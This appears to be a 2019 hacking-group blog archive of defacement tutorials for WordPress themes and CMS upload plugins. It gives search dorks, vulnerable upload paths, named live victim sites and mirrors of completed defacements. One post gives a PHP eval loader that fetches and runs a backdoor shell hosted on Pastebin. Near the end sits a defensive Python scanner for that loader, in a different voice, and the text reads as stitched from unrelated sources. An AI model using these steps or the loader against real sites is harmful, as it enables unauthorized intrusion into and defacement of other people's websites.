Showing posts from March 2019

Deface WordPress Themes Qualifire

Yo, this time I'm giving you a tutorial on defacing the WordPress Qualifire theme through its file upload. Let's get straight to it.

Dork : inurl:"/wp-content/themes/qualifire"
(Expand on it yourself 😂)

Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Online CSRF tool -> click here

Live : http://www.depal.it

First dork on Google, pick one of the sites/targets, and append the exploit path above.

Vuln? = Blank

Here I'm using the live target above.

Go ahead and open the CSRF tool
Post File : Filedata
After that, upload your file

If it works, it looks like the image below

The number 1 will appear
File location? http://target.lu/your-file
Example : http://www.depal.it/69.txt
Mirror : http://www.zone-h.org/mirror/id/32300014

Thanks To All Member Ghost Riddiculous Team

Deface 雅风工作室 - Arbitrary File Upload

Yo, this time I'm giving you a tutorial on defacing 雅风工作室 - Arbitrary File Upload. Let's get right to it.

Dork : intext:"Htmcss.Com All Rights Reserved"

Exploit : /tpl/plugins/upload9.1.0/server/php/

Live : http://jmxzw.com

Here I'm using the site above

A vulnerable site looks like the image below

Now open the online CSRF tool, click here
Post File : files[]
Once you've clicked lock target, just upload your shell/script

On success it looks like the image below

How to call the file? http://target.lu/tpl/plugins/upload9.1.0/server/php/files//[random number]_.php

If it works, it's up to you what you do next :'voos

Example : http://jmxzw.com/tmp
Mirror : http://www.zone-h.org/mirror/id/32276848


Tadaaaaaa :'v That's it, I'm TIRED OF TYPING :'voos

Thanks To All Member Ghost Riddiculous Team

Deface Radiosnet Upload

*Defacing via the Radiosnet Upload Vulnerability*

Dork : inurl:"subir_foto.php"

Exploit : /subir_foto.php

Allowed Type : jpg,png,gif

Vuln? There is an upload form like this
File location? Just click your image, then open it in a new tab

Demo : http://radiodenoticias.com.ar/subir_foto.php

Example : http://radiodenoticias.com.ar/upload_pic/resize_1552110139.jpg

Thanks To All Member Ghost Riddiculous Team

How to Shrink a Backdoor Shell

Yo, now I'm going to show you how to shrink the size of a backdoor shell

Create a script like this
<?php eval("?>".file_get_contents("Link Pastebin Kalian"));?>

Save your PHP script/backdoor shell on Pastebin

Once it is saved, add /raw/ after the Pastebin domain
Example : https://pastebin.com/raw/q3qW3EVy

Then put your Pastebin link into the script above

Example : <?php eval("?>".file_get_contents("https://pastebin.com/raw/q3qW3EVy"));?>

Then save your script :')
The file size is under 1 KB, pretty small, right? :'v

Hope this is useful :')
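Seen from the defending side, a loader of this shape is easy to hunt for, because `eval()` is fed directly by `file_get_contents()` on a remote URL. The sweep below is an added example, not part of the original post; the extension list, the `find_stagers` and `demo` names, and the sample files (built in a temporary directory) are constructed assumptions.

```python
import os
import re
import tempfile

# eval() fed directly by file_get_contents() on an http(s) URL: the loader shape shown above.
STAGER_RE = re.compile(
    rb"eval\s*\(.{0,80}?file_get_contents\s*\(\s*[\"'](https?://[^\"']+)[\"']",
    re.IGNORECASE | re.DOTALL,
)
PHP_EXTS = (".php", ".phtml", ".php5", ".inc")  # assumption: extensions the server executes


def find_stagers(webroot):
    """Return sorted (relative_path, size_bytes, remote_url) for each matching file."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(PHP_EXTS):
                continue
            path = os.path.join(dirpath, name)
            try:
                size = os.path.getsize(path)
                with open(path, "rb") as fh:
                    match = STAGER_RE.search(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if match:
                url = match.group(1).decode("ascii", "replace")
                hits.append((os.path.relpath(path, webroot), size, url))
    return sorted(hits)


def demo():
    """Scan a constructed webroot: one loader, two benign files."""
    samples = {
        "index.php": b"<?php echo 'hello'; ?>",
        "lib.php": b'<?php $j = file_get_contents("https://api.example/data.json"); ?>',
        "uploads/x.php": b'<?php eval("?>".file_get_contents("https://paste.example/raw/CONSTRUCTED"));?>',
    }
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(body)
        return find_stagers(root)


if __name__ == "__main__":
    for rel, size, url in demo():
        print(f"{rel}\t{size} bytes\tfetches {url}")
```

A hit inside an upload directory is the strongest signal; the reported URL is also worth searching for in outbound proxy or DNS logs. Setting `allow_url_fopen = Off` in php.ini stops `file_get_contents()` from fetching remote URLs at all.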

Deface Asset Manager

Defacing via Asset Manager :'(

Dork : /editor/assetmanager/

Exploit : /Editor/assetmanager/assetmanager.php

Allowed Type : jpg,png,gif,txt

File location? :v Just click your file


Demo : http://www.ciudadesygenero.org/Editor/assetmanager/assetmanager.php

Example : http://www.ciudadesygenero.org/Editor/archivos/grt.jpg

Deface WordPress DailyDeal Themes

*Deface WordPress DailyDeal Themes*
Dork : inurl:wp-content/themes/DailyDeal/

Exploit : /wp-content/themes/DailyDeal/monetize/upload/

Vuln? There is an upload form like the image below

File location :

http://site-target/wp-content/uploads/[years]/[months]/[find your file].php/html

Demo : http://www.bigdailydeals.co.uk/wp-content/themes/DailyDeal/monetize/upload/

Example: http://www.bigdailydeals.co.uk/wp-content/uploads/2019/06/1560866000985041455.html

Deface Raw Marketing Bypass Uploader

*Deface Raw Marketing Bypass Uploader*

Dork : intext:" Website by Raw Marketing"

Exploit : /editor/assetmanager/assetmanager.php

File location? Just click your file

Demo : http://www.kathmanducuisine.com.au/editor/assetmanager/assetmanager.php
Example : http://www.kathmanducuisine.com.au/editor/assets/alqi.txt

Thanks To All Member Ghost Riddiculous Team